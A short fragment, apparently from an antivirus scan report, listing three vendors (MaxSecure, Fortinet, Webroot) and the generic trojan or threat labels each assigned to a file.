MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/PossibleThreat
Webroot W32.Trojan.Gen